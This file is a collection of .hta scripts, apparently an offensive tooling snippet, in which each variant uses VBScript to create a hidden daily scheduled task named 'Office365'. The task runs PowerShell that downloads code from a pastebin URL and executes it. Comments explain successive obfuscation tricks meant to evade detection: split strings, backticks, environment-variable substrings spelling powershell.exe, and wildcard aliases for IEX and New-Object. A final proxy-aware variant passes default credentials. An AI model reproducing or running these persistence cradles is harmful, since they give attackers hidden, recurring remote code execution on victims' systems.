#This .hta scripts can be used, to create a taskschedule persistence with a not proxy aware PowerShell Download Cradle

<HTML> 
<HEAD> 
<script language="VBScript">
	Set WshShell = CreateObject("W"+"S"+"cr"+"ip"+"t."+"Sh"+"e"+"l"+"l")
		Connect="cmd.exe /c SchTasks /Create /SC DAILY /ST 12:00 /TN Office365 /TR ""pOwErsHelL -w hidDEn -nOpR  -coM 'I`eX (N`E`W`-obje`CT Net.Webclient).\\\""dowNloa`DST`RIng\\\""((\\\""https://pastebin.com/raw/Qpiz8y6c\\\""))"""	
	WshShell.Run Connect, 0, true
</script>
<HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize">
</HEAD> 
<BODY> 
</BODY> 
</HTML> 
	
	
	
<HTML> 
<HEAD> 
<script language="VBScript">
	Set WshShell = CreateObject("W"+"S"+"cr"+"ip"+"t."+"Sh"+"e"+"l"+"l")
		Connect="cmd.exe /c SchTasks /Create /SC DAILY /ST 12:00 /TN Office365 /TR ""pOwErsHelL -w HIdDEn -nOPr  -co 'i`Ex (N`E`W`-obje`CT Net.Webclient).\\\""dowNloa`DST`RIng\\\""((\\\""ht\\\""+\\\""tps://pastebin.com/raw/Qpiz8y6c\\\""))"""	
	WshShell.Run Connect, 0, true
</script>
<HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize">
</HEAD> 
<BODY> 
</BODY> 
</HTML> 
	
	
#Info: %APPDATA:~-13,1%%ALLUSERSPROFILE:~-9,-8%%OS:~-5,1%er%TMP:~7,1%he%TEMP:~-10,1%l = powershell.exe	
<HTML> 
<HEAD> 
<script language="VBScript">
	Set WshShell = CreateObject("W"+"S"+"cr"+"ip"+"t."+"Sh"+"e"+"l"+"l")
		Connect="cmd.exe /c SchTasks /Create /SC DAILY /ST 12:00 /TN Office365 /TR ""%APPDATA:~-13,1%%ALLUSERSPROFILE:~-9,-8%%OS:~-5,1%er%TMP:~7,1%he%TEMP:~-10,1%l -w HidDEn -nOPr  -co 'i`Ex (N`E`W`-obje`CT Net.Webclient).\\\""dowNloa`DST`RIng\\\""((\\\""ht\\\""+\\\""tps://pastebin.com/raw/Qpiz8y6c\\\""))"""	
	WshShell.Run Connect, 0, true
</script>
<HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize">
</HEAD> 
<BODY> 
</BODY> 
</HTML> 
	
	
	
#Info: %APPDATA:~-13,1%%ALLUSERSPROFILE:~-9,-8%%OS:~-5,1%er%TMP:~7,1%he%TEMP:~-10,1%l = powershell.exe	
#Info: &(GAL IE*) = Alias IEX
<HTML> 
<HEAD> 
<script language="VBScript">
	Set WshShell = CreateObject("W"+"S"+"cr"+"ip"+"t."+"Sh"+"e"+"l"+"l")
		Connect="cmd.exe /c SchTasks /Create /SC DAILY /ST 12:00 /TN Office365 /TR ""%APPDATA:~-13,1%%ALLUSERSPROFILE:~-9,-8%%OS:~-5,1%er%TMP:~7,1%he%TEMP:~-10,1%l -w HidDEn -nOPr  -co &(GAL IE*)((N`E`W`-obje`CT Net.Webclient).\\\""dowNloa`DST`RIng\\\""((\\\""ht\\\""+\\\""tps://pastebin.com/raw/Qpiz8y6c\\\"")))"""	
	WshShell.Run Connect, 0, true
</script>
<HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize">
</HEAD> 
<BODY> 
</BODY> 
</HTML> 
	
	
	
#Info: %APPDATA:~-13,1%%ALLUSERSPROFILE:~-9,-8%%OS:~-5,1%er%TMP:~7,1%he%TEMP:~-10,1%l = powershell.exe 
#Info: &(GAL IE*) = Alias IEX
#Info: .(Get-Command N*ct) = New-Object
<HTML> 
<HEAD> 
<script language="VBScript">
	Set WshShell = CreateObject("W"+"S"+"cr"+"ip"+"t."+"Sh"+"e"+"l"+"l")
		Connect="cmd.exe /c SchTasks /Create /SC DAILY /ST 12:00 /TN Office365 /TR ""%APPDATA:~-13,1%%ALLUSERSPROFILE:~-9,-8%%OS:~-5,1%er%TMP:~7,1%he%TEMP:~-10,1%l -w HidDEn -nOPr  -co &(GAL IE*)((.(Get-Command N*ct)Net.WebClient).\\\""dowNloa`DST`RIng\\\""((\\\""ht\\\""+\\\""tps://pastebin.com/raw/Qpiz8y6c\\\"")))"""
	WshShell.Run Connect, 0, true
</script>
<HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize">
</HEAD> 
<BODY> 
</BODY> 
</HTML> 
	
	

#Info: This .hta script can be used, to create a taskschedule persistence with a proxy aware PowerShell Download Cradle
#Info: To escape \" in .hta \\\""
<HTML> 
<HEAD> 
<script language="VBScript">
	Set WshShell = CreateObject("W"+"S"+"cr"+"ip"+"t."+"Sh"+"e"+"l"+"l")
		Connect="cmd.exe /c SchTasks /Create /SC DAILY /ST 12:00 /TN Office365 /TR ""PoWeRsHelL.eXe -NoP -w HidDen -c $a=neW-ObJeCt nET.wEbClieNt;$a.pROxy=[NeT.WeBreQueSt]::geTsyStEmweBprOxy();$a.prOxY.crEdEnTials=[NEt.crEdEnTiaLcaChe]::deFaUltcrEdeNtials;IeX $a.DOwNLOadstRiNg(\\\""ht\\\""+\\\""tps://pastebin.com/raw/Qpiz8y6c\\\"")"""
	WshShell.Run Connect, 0, true
</script>
<HTA:APPLICATION ID="test"
WINDOWSTATE = "minimize">
</HEAD> 
<BODY> 
</BODY> 
</HTML>
